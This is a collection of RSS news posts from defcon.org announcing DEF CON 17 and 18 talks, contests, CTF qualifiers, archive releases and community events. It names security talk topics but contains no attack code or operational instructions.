==> DEF CON 18 CFP Closing Soon!

https://www.defcon.org/defconrss.xml Only a few more days to submit your CFP to speak at DEF CON 18! Call for Papers will officially close Tuesday June 1, so get those submissions in to share your cutting edge hacking research with the world! Check out the official announcement for details, and then fill out the Call for Papers Form.

==> New on defcon.org: CTF Archive and Speaker's Corner!

https://www.defcon.org/defconrss.xml We've got a couple of new sections on defcon.org, the first of which is the Capture The Flag Archive, a page dedicated to collecting accounts, walk throughs and other resources of Capture the Flag at DEF CON over the years, not only for history's sake but so the uninformed and/or interested can better grasp the epic journey that teams must face on the road to DEF CON CTF victory! We Just collected a bunch of the walkthroughs, video, and write-ups from this past weekend's CTF Quals so check it out! The second new section of defcon.org is called Speaker's Corner, where we will be posting short stories, talk teasers, technical info and words of wisdom from our DEF CON speakers past & present. The first post is by DEF CON 17 Speaker Jayson E. Street, and is entitled "Trying to Be a Wise Man at DEF CON", and thanks to Jayson for being the first to jump onboard! We hope you enjoy these new additions to the site and will help them to grow and be useful to all!

==> Minibosses at theSummit

https://www.defcon.org/defconrss.xml For immediate release: MiniBosses (http://www.minibosses.com/) have signed on as an official act to perform at theSummit on Thursday July 28th during DEF CON . They are the second act to confirm a performance spot at this years Fundraiser. At ShmooCon in February, DualCore announced that they will return again for this years event for the 4th consecutive year and 3rd year as the headlining act. Follow Us on Twitter for Event and Feature Guest Updates: www.twitter.com/effsummit Coming to event? Make your presences known on the Facebook Event Page: http://www.facebook.com/event.php?eid=112161832149640 About Mini Bosses: Four mid-20's guys from Phoenix got togeather for one common cause...Recreate the NES hits you all know and love in real-time on stage for everyones enjoyment pleasure. They consider all Bossies to be their groupies from the costs of Toyko to the midlands of Michigan. If your into 8-bit power cords, get ready to ride the midi wave of Awesome! About EFF: Blending the expertise of lawyers, policy analysts, activists, and technologists, EFF achieves significant victories on behalf of consumers and the general public. EFF fights for freedom primarily in the courts, bringing and defending lawsuits even when that means taking on the US government or large corporations. About Vegas 2.0: A transient, a local or a weekend Vegas Warrior, however you peg us, we are THE Las Vegas InfoSec group. Our members are long time DEF CON and Computer Security Industry avant guards. When we are not planning theSummit, we spend are free cycles conjuring up Social Engineering, Web and Windows attacks. We are always looking for new locals to Las Vegas OR frequent visitors to stop by our labs conveniently located in North Las Vegas for a beer and some InfoSec foo!

==> Contest & CFP Action Required!

https://www.defcon.org/defconrss.xml The vortex is swirling folks. There's sense of urgency in the air, you can't quite put your finger on it, but it's beginning to make you a little nervous and a little excited. Can you feel it nagging the back of your mind? That little voice saying, ever so quietly, "Less than 2 weeks left to submit a talk!", and "CTF Quals reg ends tomorrow!". Or maybe you hear, "write a short story", "Figure out LosT's puzzles" or "enter the Art Contest". That voice is actually us reminding you that all of these things are coming up or going on within the next two days to three weeks. So if you want to participate, you better get moving! Keep up on current events, as always, on the DEF CON Twitter, DEF CON Facebook, DEF CON RSS Feed and here on defcon.org!

==> DEF CON 18 Artwork Contest is Open!

https://www.defcon.org/defconrss.xml Its time again my creative friends, for another year of the DEF CON Artwork Contest! Get out your GIMP or Windows Movie maker and give a shot at making some awesome DEF CON Artwork! This year were putting the art contest back in the digital realm. There will be three types of entries, none of which are the standard shirt, sticker, poster designs of the past. This time around we want you to think about themes, desktop wallpapers and animation/motion graphics. You may draw inspiration from past DEF CON art or go in a whole new direction. Check out all the rules at: https://forum.defcon.org/showthread.php?t=11342

==> More DEF CON 18 Speakers!

https://www.defcon.org/defconrss.xml Here's another fresh batch of delicious Speaker goodness for you! Enjoy! Exploiting Internet Surveillance Systems Decius The Search for Perfect Handcuffs... and the Perfect Handcuff Key Deviant Ollam Jackpotting Automated Teller Machines Redux Barnaby Jack The Power of Chinese Security Anthony Lai, Jake Appelbaum and Jon Oberheide Repelling the Wily Insider Matias Madou and Jacob West You Spent All That Money And You Still Got Owned... Joseph McCray Cyberterrorism and the Security of the National Drinking Water Infrastructure John McNabb HD Voice - The Overdue Revolution Doug Mohney DEF CON Security Jam III: Now in 3-D? David Mortman, Rich Mogull, Chris Hoff, Rsnake, Dave Maynor, and Larry Pesce "This Needs To Be Fixed" and Other Jokes In Commit Statements Bruce Potter and Logan Lodge Airport Body Scanners and Possible Countermeasures Paul F. Renda Injecting Electromagnetic Pulses Into The Electric Grid Paul F. Renda SHODAN for Penetration Testers Michael "theprez98" Schearer SMART Project: Applying Reliability Metrics to Security Vulnerabilities Blake Self, Wayne Zage and Dolores Zage Hacking Oracle From Web Apps Sumit "sid" Siddharth So Many Ways to Slap A Yo-bleep:: Xploiting Yoville and Facebook for Fun and Profit strace Attack the Key, Own the Lock Schuyler Towne and datagram Balancing the Pwn Trade Deficit Valsmith, Owner, Colin Ames and Anthony Lai Keep your eyes on the DEF CON 18 Speakers Page and the DEF CON Twitter for new speaker announcements!

==> DEF CON 18 Speakers Posted!

https://www.defcon.org/defconrss.xml Here we go! Here is the first of many batches of DEF CON 18 talks to be posted! Expect more early in the week! FOCA2: The FOCA strikes back Chema Alonso and José Palazón "Palako" Connection String Parameter Attacks Chema Alonso and José Palazón "Palako" SCADA and ICS for Security Experts: How to avoid cyberdouchery James Arlen Web Services We Just Don't Need Mike "mckt" Bailey Our Instrumented Lives: Sensors, Sensors, Everywhere... Greg Conti Cloud Computing, a weapon of mass destruction? David "VideoMan" M. N. Bryan The keys to running a successful DEF CON Group by DC612 David "VideoMan" M. N. Bryan and Jared Bird Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device Adrian Crenshaw Constricting the Web: Offensive Python for Web Hackers Nathan Hamiel and Marcin Wielgoszewski Hardware Black Magic: Designing Printed Circuit Boards Dr. Fouad Kiamilev, Corey 'c0re' Lange and Stephen 'afterburn' Janansky DCFluX in: Moon-bouncer Matt "DCFluX" Krick Air Traffic Control Insecurity 2.0 Righter Kunkel "This is not the droid you're looking for..." Nicholas J. Percoco and Christian Papathanasiou Malware Freak Show 2: The Client-Side Boogaloo Nicholas J. Percoco and Jibran Ilyas Build a Lie Detector/Beat a Lie Detector Rain and j03b34r Keep your eyes on the DEF CON 18 Speakers Page and the DEF CON Twitter for new speaker announcements!

==> New DEF CON 18 Site!

https://www.defcon.org/defconrss.xml Check out the new site for DEF CON 18! It's got the most basic info for now, so keep your eyes peeled as all of the great talks, contests and events solidify! You can expect the first round of accepted speakers to be posted very soon! We're also working on a page to guide those new to DEF CON where to look for pertinent information. You will be able find all of the scheduling and entertainment info here as well as it becomes available, so be sure to follow us on the Twitter or Facebook feeds to stay up to the minute as we post new data! Wander around, get familiar, and be sure to check back for frequent updates to the madness that is DEF CON 18!

==> DEF CON 18 Updates

https://www.defcon.org/defconrss.xml Do your hear it? The whir of the gears of DEF CON planning reaching operating speed? All around us events are springing into action! HighWiz has stated intention to bring back DC101, a primer for those new to attending DEF CON. Not many details yet, but you can stay tuned to DC101 on the DEF CON Forums to stay up to date with details as they become available! We've also noticed that The Summit will be back this year, hosted by Vegas 2.0 to benefit the EFF! You can find details on the Summit Facebook page! We also can't fail to mention recent activity on LosT's Mystery Challenge. He says it's going to be the last year, so you better pay attention if you want to participate! You can follow the Mystery Challenge Forum and the Official Mystery Challenge Site at ten-five-seven.org. There is also a new forums based contest, called "What's in Neil's Pants", wherein Nikita asks a trivia question every week for the chance to win fabulous prizes from the things Neil leaves in his many pockets when he throws his pants in the hamper. You can also look for the DEF CON 18 Website to launch by the end of the month with an announcement for the DEF CON 18 Artwork Contest to be released in early May! As always, keep your eyes trained on the DEF CON Twitter for Updates as they occur!

==> New DEF CON 18 Short Story Contest!

https://www.defcon.org/defconrss.xml This contest is new this year and we are hoping it goes over well. Lots of you out there are avid writers and some just have an incredible imagination that when put to paper it blows your mind. Speaking from several years of reviewing white papers and slide decks, you guys are hilarious. We'd like to see your flair for creative writing put to another use and reward you for a (*cough*troll*Cough*) job well done. Good Luck! Check out all the details on the Short Story Contest Forum

==> EFF Proudly Presents the First Annual Defcon Getaway Fundraising Contest!

https://www.defcon.org/defconrss.xml From EFF.org: As the winter snows begin to melt, revealing a landscape full of promise and hope, a hackers thoughts turn to flights of fancy: specifically, the thought of being in Las Vegas during the last weekend in July. If youre one of those hackers and you love digital freedom, EFF would like your help spreading the word about our efforts to protect and defend coders rights by encouraging your friends and neighbors to join you in supporting us. In return, EFF wants to help the best EFFvangelists enjoy Defcon 18 in style! Read more...

==> DEF CON 18 Event/Contest Update!

https://www.defcon.org/defconrss.xml Contest and event planning is starting to heat up! A few more have surfaced and some others have begun conversation! Check out your favorite DEF CON Contest or Event link below for more info! 10,000¢ Hacker Pyramid: Call for Help Artwork Contest: Coming in May Badge Hacking Contest: Forum Active Be The Match Foundation - Bone Marrow Drive: NEW! Forum Active Beverage Cooling Contraption Contest: Forum Active Cannonball Run: Forum Active Capture the Flag: Quals Announced DEF CON Shoot: Forum Active Geo Challenge: Forum Active Social Engineering Contest: No Posts Goon Band — Recognize: Forum Active Forum Meet: Forum Active Hacker Jeopardy: Forum Active Hacker Karaoke: Forum Active Hardware Hacking Village: Forum Active Lockpicking Contests: Forum Active Mystery Challenge: Forum Active Official DEF CON DJs, Music, and Events: Call for DJS, Forum Active Open CTF: New Organizers, Forum Active QueerCon: No Posts Scavenger Hunt: Forum Active Spot the Fed:Forum Active Keep your eyes on the DEF CON Twitter, DEF CON Facebook, DEF CON RSS Feed and defcon.org for updates!

==> DEF CON 18 CTF Quals Announced!

https://www.defcon.org/defconrss.xml From the DEF CON Forums: FOR IMMEDIATE RELEASE 1 APRIL 2010 DEFCON CTF QUALIFIER ANNOUNCED Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFON 18 CTF. Stock up on Red Bull, put the pizza delivery on speed dial, polish up your fancy shellcodes, and replenish the duct tape supply. The competition for these coveted spots will be held over 55 non-stop hours 21-24 May. When the dust clears only the 10 best will be invited to join us this summer in sin city for the annual DEFCON deathmatch. In historical fashion VedaGodz will be automatically be permitted contest entry. However, we wish to point out that real ninjas would still attempt to qualify. The qualification round will again be in the style of game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking across a vast realm of security. This isn't CTF like your mama used to make. Level 1 questions make CISSPs turn red, Level 2 make SANS Fellows cry in frustration, Level 3 are typically only answerable by sheep of above average barnyard intelligence, you get the idea. Pause your atari emulator and hop over the ddtek.biz to register. Only those that pre-register are permitted to play. Registration site: http://ddtek.biz/register.html Registration opens: 01 Apr 2010 00:00:00 UTC Registration ends: 20 May 2010 00:00:00 UTC Qualifications open: 21 May 2010 19:00:00 UTC Qualifications ends: 24 May 2010 02:00:00 UTC More information that will follow via your registered email address. Those with SANS certs need not apply. CISSPs are right out.* Vulc@n Difensiva Senior Engineer Diuntinus Defense Technologies, Inc.

==> DEF CON 18 Open CTF: DC949 Passes the Torch

https://www.defcon.org/defconrss.xml DC949, the creators of the Open CTF Contest (formerly Amateur CTF), after five long years have decided to step down as organizers. DEF CON would like to thank them for all of their hard work over the last five years in making a contest that was not only fun, but also open to all who'd like to test the waters of Capture the Flag type competition. They have passed the torch to a team that has competed in their contest many times, TubeWarriors. Welcome TubeWarriors, we wish you luck! You can read more in the Open CTF thread on the DEF CON Forums, as well as DC949's Farewell Thread.

==> DEFCON 18 Badge Call-for-Integration

https://www.defcon.org/defconrss.xml With the electronic DEFCON badge now in its fifth incarnation, we've decided to try something different. We're opening our kimono (just slightly) for DEFCON attendees, groups, villages, or contest organizers who want to integrate some piece of information or hide some piece of data in the badge to help further their cause during the con. For example, maybe your contest wants to hide a clue on the badge and then contestants have to find it in the code or press a certain button to reveal it... Read more on the DEF CON Forums. Submissions are due by April 1, 2010.

==> Be The Match Foundation - Bone Marrow Drive @ DEF CON 18

https://www.defcon.org/defconrss.xml As some of you may know, One of our speakers Thomas Wilhelm was recently a bone marrow donor from the Be the Match program. He contacted us about setting up a registry drive at Defcon 18. We like that Idea and are going to do what we can to make sure they have the space they need in order to grow their donor registry. You can Read More on the DEF CON Forums, and keep your eye on that forum for further details as they develop.

==> Want To Be A DJ or Band At DEF CON 18?

https://www.defcon.org/defconrss.xml The Artist Bookings for DEF CON 18 Bands and DJs are currently open! If you are a DJ or a Band that would like to play at the Black and White bleep, by the Pool, in the Chill Out area, or various other DEF CON events, now is the time to submit your application! DJ Great Scott will be accepting submissions up until May 3rd, 11:59pm (23:59) CST (US CENTRAL). You can find his post announcing this on the DEF CON Forums and fill out the application form. Good Luck!

==> Pics from DEF CON 17 on Facebook!

https://www.defcon.org/defconrss.xml Head on over to the Official DEF CON Facebook Fan Page and if you're not already, become a fan! We've uploaded pictures taken by the official DEF CON 17 photographer, ETA. Also some pics from Nikita, Dark Tangent, and other Goons who sent them to us. While you're there, start a discussion or leave us a comment, and Let us know where your DEF CON pics are!

==> Book your room for DEF CON 18!

https://www.defcon.org/defconrss.xml Get your room for DEF CON 18 booked early on the Riviera Reservation page for DEF CON 18! Rates are $99/night for the first two people! Additional fees may apply for more than 2 people per room.

==> DEF CON 18 Call for Papers is Open!

https://www.defcon.org/defconrss.xml More exciting than the latest 0-day in Acrobat or Internet Exploder, it's time for the DEF CON CFP to open! Check out the DEF CON 18 CFP Announcement for all the details!

==> Confirmed Contest and Events for DEF CON 18!

https://www.defcon.org/defconrss.xml The following Contests and Events have announced their intention to return for DEF CON 18! The ones that already have post activity are marked below. If you have an idea for a new contest or event, you can check out the New Ideas forum and see what kind of response you get! 10,000¢ Hacker Pyramid: No Posts Artwork Contest: No Posts Badge Hacking Contest: No Posts Beverage Cooling Contraption Contest: Forum Active Cannonball Run: No Posts Capture the Flag: No Posts DEF CON Shoot: Forum Active Geo Challenge: No Posts Social Engineering Contest: No Posts Hacker Jeopardy: Forum Active Hacker Karaoke: No Posts Hardware Hacking Village: Forum Active Lockpicking Contests: Forum Active Mystery Challenge: No Posts Official DEF CON DJs, Music, and Events: Call for DJS, Forum Active QueerCon: No Posts Scavenger Hunt: No Posts Spot the Fed:Forum Active We'll post updates as they happen on the DEF CON Twitter, DEF CON RSS Feed and here on the site!

==> DEF CON Archives Complete!

https://www.defcon.org/defconrss.xml DEF CON 9-11 music is now live, with RSS feeds for each. This completes the conversion of the DEF CON Archives for your enjoyment! You can find the RSS feeds at: DEF CON 10 https://www.defcon.org/podcast/defcon-9-music.rss https://www.defcon.org/podcast/defcon-10-music.rss https://www.defcon.org/podcast/defcon-11-music.rss

==> DEF CON 17 Merch at J!NX

https://www.defcon.org/defconrss.xml Was the swag line at the show too long for you? Just didn't get a chance to pick up a shirt? You can now find all of the remaining DEF CON 17 Merchandise at J!NX! There's even some shirts left over from DEF CON 16, Check it out!

==> DEF CON Archives Nearing Completion!

https://www.defcon.org/defconrss.xml DEF CON 10 and 11 presentation audio and video are now converted and live on their respective archives pages, and we have also posted RSS feeds for each. This makes the presentation archives complete! All that remains is to finish the DEF CON 9-11 Music RSS feeds, and the archives will be whole and up to date! You can find the RSS feeds at: DEF CON 10 https://www.defcon.org/podcast/defcon-10-audio.rss https://www.defcon.org/podcast/defcon-10-video.rss DEF CON 11 https://www.defcon.org/podcast/defcon-11-audio.rss https://www.defcon.org/podcast/defcon-11-video.rss Or check out the DEF CON Media Archives Page! Updates will be posted here on defcon.org, media.defcon.org, and the DEF CON Twitter, so keep watch!

==> Pricing for DEF CON 18

https://www.defcon.org/defconrss.xml As the CPU cycles of DEF CON 18 Planning begin to rise toward 100%, we wanted to inform you that the price of admission will be rising slightly for DEF CON 18 to $140 USD due to price increases in the cost of doing business in Las Vegas and Washington State. The economy is in a slump, but don't tell the tax crazy cities that! I can't afford that, you say? You could offset this modest bump in price if you were to save an extra 10 per day from now until con. That's what, one can of Jolt Cola per week? For almost four days of some of the most groundbreaking talks, contests, events and hacker social funtime around? Check the newspaper coin returns, look under your couch cushions, keep your eyes on the ground for change! You'll find that extra $20, and it'll be worth it! We are planning to make DEF CON bigger and better than previous years, with a new "No Drama Badge™" to keep you out of lines and in action. So keep watch on defcon.org and the DEF CON Twitter for news of the surprises we have in store!

==> Happy New Year from DEF CON!

https://www.defcon.org/defconrss.xml As 2009 fades away into the memory back ups, we'd like to wish you all happy hacking in 2010! At DEF CON World Domination HQ, we are wrapping up the last of the archiving and moving to get into DEF CON 18. We have some new surprises in development to make this year's show even better. So stay tuned to the DEF CON RSS Feed and the DEF CON Twitter for the latest updates as we release past content and announce new events and contests! We'll be opening the DC 18 Call for Papers some time in February, and now is a great time to start thinking about new ideas you may have for DEF CON 18. You can follow and participate in the Planning and New Ideas sections of the DEF CON Forums. Happy New year to all from the DEF CON Team!

==> DEF CON Archives Pages Up and Running!

https://www.defcon.org/defconrss.xml Gone are the days of the 10 mile deep DEF CON archives page! The new and improved archives pages for DEF CON 1-10 are now all up and running to match the 11-17 archives posted earlier this year. There is still a bit of audio left to transcode, and a few more RSS feeds coming, so keep your eyes on the archives and our twitter feed for those developments as they occur. You can also check out media.defcon.org for the list of of the most current updates to the media from past shows.

==> DEF CON HQ Update

https://www.defcon.org/defconrss.xml Hey Hackers, we just wanted to let you know what's going on here at DEF CON World Domination HQ! DT, Nikita and myself are grinding away at the DEF CON Archives working on the bestest New Year's gift ever, filling in the gaps and re-encoding all of the content from all of the past cons! We're also making audio and video RSS feeds for years that don't have them, and trying to pull some SEO magic to make everything ultimately more findable. SO, keep your eyes on the DEF CON Archives for all of the great stuff from the past 17 years that you forgot you wanted to know. If you don't already follow, the DEF CON Twitter feed is a great place to get the freshest announcements on what we are doing! By the way, the buzz for DEF CON 18 is already humming on the DEF CON Forums, and a few of the contests have planning threads and announcements open. Now is a great time to start thinking about new ideas that you might want to propose for this year's DEF CON, so post them there if you've got a great new idea!

==> Dark Tangent to Keynote Virtual Event

https://www.defcon.org/defconrss.xml Jeff Moss (Dark Tangent) to keynote Black Hat/Dark Reading virtual event December 9th. Visit https://www.blackhat.com/html/virtual2009/virtual2009-home.html for info.

==> Early Christmas! DEF CON 17 Video and Audio Now Online!

https://www.defcon.org/defconrss.xml That's right kids! Whether you've been naughty or nice, all of the audio and video from DEF CON 17 is now available for download! You can get it by heading to the DEF CON 17 Archive Page, and check out all of the awesome talks you want. You can also get them straight from the iTunes store or from the following RSS Feeds: * Speaker & Slides contains video of the speaker and their slides. * Slides contains video of the slides with speaker audio. * Audio for those you just want to listen to. We're also considering posting them soon for one massive download over torrent and peer to peer, so stay tuned, and enjoy!!

==> Re-encoded Past DEFCON Content!

https://www.defcon.org/defconrss.xml Dark Tangent has been busy this past weekend, re-encoding the Audio from DEFCON 1 through 6 into iPod friendly m4b format! While he was at it, he decided to also re-encode the Hacker Documentaries in the archives to m4v format for your viewing pleasure! The audio from 1-6 can also be downloaded straight from iTunes! Also check out media.defcon.org for peer-to-peer links and links to all of the past media we're working on! DEFCON 1 Audio Links | DEFCON 1 Audio RSS DEFCON 2 Audio Links | DEFCON 2 Audio RSS DEFCON 3 Audio Links | DEFCON 3 Audio RSS DEFCON 4 Audio Links | DEFCON 4 Audio RSS DEFCON 5 Audio Links | DEFCON 5 Audio RSS DEFCON 6 Audio Links | DEFCON 6 Audio RSS Re-encoded Hacker Documentaries Hacker Documentary - 1994 - Unauthorized Access by Annaliza Savage Hacker Documentary - 1995 - Hackers 95 by Phon-E and R.F. Burns Hacker Documentary - 1997 - Hacks by Christine Bader Hacker Documentary - 2000 - Commodore 64 Cracks by Iron Feather

==> DJ Event Videos from DEFCON 17!

https://www.defcon.org/defconrss.xml For your visual and auditory pleasure, check out the following videos of the fantastic sets recorded from some of the DJ Events at DEFCON 17! Special thanks to Liquid8or for recording and providing these videos! Download and enjoy! Corrupt Data DJ Njntrubl - End of BW Ball DJ Felix 1 - Pool Party DJ Felix 2 - Pool Party DJ Felix Mix DJ Great Scott 1 - BW Ball DJ Great Scott 2 - BW Ball DJ Great Scott 3 - BW Ball DJ Great Scott 4 - BW Ball DJ Great Scott and Sailor Gloom - BW Ball DJ Jackalope - BW Ball DJ Jackalope - End of BW Ball DJ Kricz Klink - BW Ball DJ Pepse - Pool Party DJ Pepse and Felix - Pool Party DJ Reeves - NSB DJ Sailorgloom and Kricz Klink - BW Ball DJ Simo Sleevin - NSB DJ Simo Sleevin and Scritch - NSB DJ Undecided 1 - BW Ball DJ Undecided 2 - BW Ball DJ Undecided 1 - NSB DJ Undecided 2 - NSB DJ Undecided and Jackalope - BW Ball Video from NSB 1 Kricz Klink and Njntrubl - BW Ball DJ Jackalope Mix Clip

==> DEFCON 17 Early Release Videos!

https://www.defcon.org/defconrss.xml Check out some of the hot presentations from DEFCON 17! We'll be releasing all of the videos for free a few months out, but for now we've chosen a few we think you might enjoy! If you'd like to purchase the entire DVD collection of the DEFCON 17 presentations, you can do so at The Source of Knowledge website. Failure Adam Savage Video | Audio "Smart" Parking Meter Implementations, Globalism, and You Joe Grand, Jake Appelbaum, and Chris Tarnovsky Video and Slides | Slides | Audio More Tricks for Defeating SSL Moxie Marlinspike Video and Slides | Slides | Audio The Day of the Updates Itzik Kotler and Tomer Bitton Slides | Audio Advancing Video Application Attacks with Video Interception, Recording, and Replay Jason Ostrom and Arjun Sambamoorthy Slides | Audio

==> DEFCON 17 CTF Packet Captures & Binaries Available!

https://www.defcon.org/defconrss.xml The DEFCON 17 CTF packet captures and binaries are now available via bittorrent. Enjoy!

==> DEFCON 17 Press Page Updated!

https://www.defcon.org/defconrss.xml Head on over to the DEFCON Press Page and check out the news from this year's show! You can also find the press listed on the DEFCON 17 Archives Page! If you've come across a good article on DEFCON 17 that you think should be up there, don't hesitate to send it to neil {at} defcon }dot{ org for posting!

==> DEFCON 17 Archives Page is Live!

https://www.defcon.org/defconrss.xml You can now peruse the DEFCON 17 Archives Page, which contains links to all of the presentation materials and code available, including all updated materials we have recieved! We'll have the printed program and press links up soon, and down the road you will be able to download all of the audio and video of the the talks for free! We're working on getting a few early release videos up next week to tide you over!

==> Upload all of your DEFCON 17 Photos to pics.defcon.org!

https://www.defcon.org/defconrss.xml Help to preserve and share those DEFCON 17 memories on pics.defcon.org! If you have a DEFCON Forums account, you already have a pics account, just use the same login information. While you're at it, submit your galleries to defconpics.org as well!

==> Follow the Post-Con discussion on the DEFCON Forums

https://www.defcon.org/defconrss.xml Get over to the DEFCON Forums to join in on the post-con buzz from DEFCON 17! You can find out what people thought, content links, and it's never to early weigh in on next year's show. Remember, DEFCON is <em>your</em> con, and the best way to get involved is to get in on the discussions posted at forum.defcon.org. Have an idea for a new contest or event? It's the best place to start!

==> Autographed, White "I Hack Charities" Shirts Listed on Ebay

https://www.defcon.org/defconrss.xml Up for Auction: THREE "I hack charities" White Signed T-ShirtS. All of the proceeds from these auctions except the ebay auction cost will be donated to "Hackers for charities" http://johnny.ihackstuff.com/ These Shirts were Signed by Most of the Big names at Defcon 17. Anyone that Attended may have seen these shirts displayed at the "Hackers for Charities" booth on sunday. Everyone online and at defcon has seen the Black "I hack charities" T-shirts. But not many have seen the white ones. Well that is because there were only 4 white shirts printed!! Johnny Long has 1 and the other 3 were all signed by the people below for these auctions. Each shirt is unique with the location of the signatures and the quotes written by the signers. These shirts were signed by: Johnny Long Dan Kaminsky Jeff "The Dark Tangent" Moss Kevin Mitnick Joe "$Kingpin$" Grand Bruce Potter Nikita Priest The Entire 2009 CTF winning team and many others. Listing URLs: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458285523 http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458285993 http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120458286499

==> DEFCON 17 Receipt Posted, Aaaand We're Spent...

https://www.defcon.org/defconrss.xml We'll we've made it back to our respective homes, with another awesome DEFCON on the books! We are now in recovery mode, and normal updating will resume next week! The DEFCON 17 Receipt of Admission is now posted! Thanks to all for making this a fantastic DEFCON!

==> Don't miss NIST's Hack the Quantum at DEFCON 17!

https://www.defcon.org/defconrss.xml Hack the Quantum Presented by the Joint Quantum Institute, National Institute of Standards and Technology and University of Maryland, and the Centre for Quantum Technologies, National University of Singapore With a hands-on Bell-o-meter for entangled photons you can convince yourself that there are quantum effects beyond classical physics: a real qubit is offered to the participant who achieves the strongest violation of a Bell inequality. We also present a fresh attack that breaks many current quantum crypto systems, and demonstrate a photon-based quantum randon number generator. Find it in Capri 114 /115 Friday-Sunday at DEFCON 17!

==> The Community Delivers Great Mobile Options for DEFCON 17!

https://www.defcon.org/defconrss.xml There has been an outpouring of mobile ready and mobile friendly options from the DEFCON community this year to make your DEFCON scheduling easier! First there is a full blown (and very cool) unofficial iPhone app that has been submitted to the Apple store for review, made by Johnnie "Jedi" Pittmann (@dtjedi) and Todd Kimball (@tkimball). As of this posting, This app is not yet available from the Apple store. They have opted, pending acceptance from Apple, to make the app available via ad-hoc distribution, and will be accepting requests by email until Wednesday, July 29th at 9am PDT. The method, contact info, and possible risks are clearly outlined at http://www.group6.net/AdHoc.html From their site on http://www.group6.net/Defcon_App.html: After years of misplaced, begged, borrowed, stolen Defcon schedules, we decided to do something to help. Introducing the Defcon 17 iPhone app. Get all the up to date details on the con on your iPhone/iPod Touch. In addition to that, you can view the offical Defcon RSS feed and #defcon Twitter posts. Talk and event calendars, speaker and dj bios, and a map of the venue. Features - Talk Calendar - Event Calendar - Speaker/DJ Biographies - Defcon RSS Feed Reader - Twitter #defcon Not to mention the great efforts of Darth Null to bring you an extremely useful web-based iPhone/mobile ready schedule and map application! You can find his fantastic work at http://www.darthnull.org. There are also a couple of Google calendars out there, one for events, thanks to JonM, and a full schedule at http://defcon.starthan.net/ All of these folks are coordinating together for updates, to bring you the freshest info from DEFCON 17! A huge thank you all of them for contributing!

==> Keep Up On What's Happening At DEFCON 17!

https://www.defcon.org/defconrss.xml You can go to the DEFCON Qik Feed or our Qik group and check out we and group members are doing at con! Use the #defcon hashtag on Twitter to search for and make defcon related tweets easier to find!

==> Metasploit Track at DEFCON 17!

https://www.defcon.org/defconrss.xml Check out all the Metasploit goodness you can absorb in the Metasploit Track at DEFCON 17! It all takes place Saturday in Track 2! 10:00 - 10:50 Breaking the "Unbreakable" Oracle with Metasploit Chris Gates & MC 11:00 - 11:50 Using Guided Missiles in Drive-Bys: Automatic browser fingerprinting and exploitation with Metasploit egypt 12:00 - 12:20 WMAP: Metasploit goes Web Efrain Torres 14:00 - 15:20 MetaPhish Val Smith, Colin Ames, David Kerb 15:30 - 16:00 MSF Telephony I)ruid 16:10 - 16:40 Metasploit Evolved, Meterpreter Advances, Hacking the Next Internet HD Moore 16:50 - 17:20 MSF Wifi Mike Kershaw 17:30 - 18:00 App Assessment the Metasploit Way David Maynor 18:10 - 18:40 Macsploitation with Metasploit Dino Dai Zovi 18:50 - 19:20 Metasploit Autopsy: Recontructing the Crime Scene Peter Silberman & Steve Davis

==> Badge Hacking Buzz!

https://www.defcon.org/defconrss.xml Check out the Badge Hacking Contest threads on the DEFCON Forums to see what everyone is talking about bringing/using to Hack the badge this year. It might give you some inspiration!

==> The Summit at DEFCON 17

https://www.defcon.org/defconrss.xml Don't forget to attend The SUMMIT Fund Raiser for the EFF (www.eff.org), 50+ Speakers attending, 3 Djs, VIP event, Monaco Tower (TOP FLOOR), Top of the RIV , 8:30pm Thursday Night. See Forum for more info. Add to your social calendar. $30/$15 Student.

==> DEFCON 17 Badge Pre-release Info!

https://www.defcon.org/defconrss.xml Joe Grand has posted some pre-release info on the DEFCON Forums to get you started for the badge hacking contest this year. Go check it out at: https://forum.defcon.org/showthread.php?t=10655

==> DEFCON 17 Events/Contests Posted on Schedule Page!

https://www.defcon.org/defconrss.xml The specific info for events and contests has been posted in the DEFCON 17 Schedule Page! If you have an event or contast that is not posted please send hours of operation and location to neil at defcon.org, and we'll get them up!

==> DEFCON 17 Google Calendar

https://www.defcon.org/defconrss.xml JonM has been so kind as to begin to start populating a Google calendar of the events for DEFCON 17! More events will be added as the times and locations come in!

==> DEFCON 17 CTF Quals Cartoon Write Up

https://www.defcon.org/defconrss.xml Check out this awesome write-up of the CTF Quals from one of the qualifying teams, the Sapheads! Clever and educational, it provides a great perspective on the thought processes behind solving the B300 section of the qualification round. Sounds like they plan to do more, so we'll keep an eye out! http://hackerschool.org/DefconCTF/17/B300.html

==> Hacker Jeopardy is Looking for Team Sign Ups

https://www.defcon.org/defconrss.xml From G Mark on the DEFCON Forums: THE PROPER (AND ONLY) WAY TO SIGN UP A TEAM FOR HACKER JEOPARDY Okay, just to make sure that everyone has an equal opportunity, here are the directions to sign up your team. Don't do something else (like post a reply to Winn's thread, since it might not get read in time -- we had this problem last year.) 1. Open an e-mail to "hackerjeopardy@gmail.com" 2. Include your TEAM NAME and the real names and handles of your three (3) team players. (Privacy policy: we protect your identity unless a Fed or someone with a whole bunch of cash wants it.) 3. Explain why you are 31337 enough to play this year. Brag like you're trying to get lucky. 4. Include at least one cellphone number so we can contact you to notify if you're playing or there's a problem with your entry. 5. Send the e-mail as soon as possible, but absolutely no later than 90 minutes before the scheduled start of the round to be played. In case of any dispute, you're wrong (unless you are an entity described in #2 above.)

==> Alternate slots for ninjas... LosT @ Con Mystery Challenge

https://www.defcon.org/defconrss.xml There are still alternate slots open for teams considering trying to register. There *may* be a way for alternate teams to knock teams from their spots on day one of the contest this year. Check out the official Mystery Challenge site at http://ten-five-seven.org

==> CannonBall Run is Back!

https://www.defcon.org/defconrss.xml The 5th Annual CannonBall Run is set to start Thursday July 30th 2009 with the fist car leaving at 11:00 AM. We will start in Redondo Beach and arrive yet again at the Riviera Hotel in Las Vegas, Nevada. website: http://moloch.org/cannonball/ DEFCON Forum: https://forum.defcon.org/forumdisplay.php?f=474 twitter: http://twitter.com/dccannonballrun qik: http://qik.com/tommee

==> Team Fortress 2 Tournament - Only Two Days Left to Sign Up for Quals!

